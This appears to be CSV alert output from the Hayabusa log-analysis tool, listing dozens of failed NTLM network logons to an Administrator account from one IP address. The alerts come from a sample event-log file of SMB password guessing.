01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.584 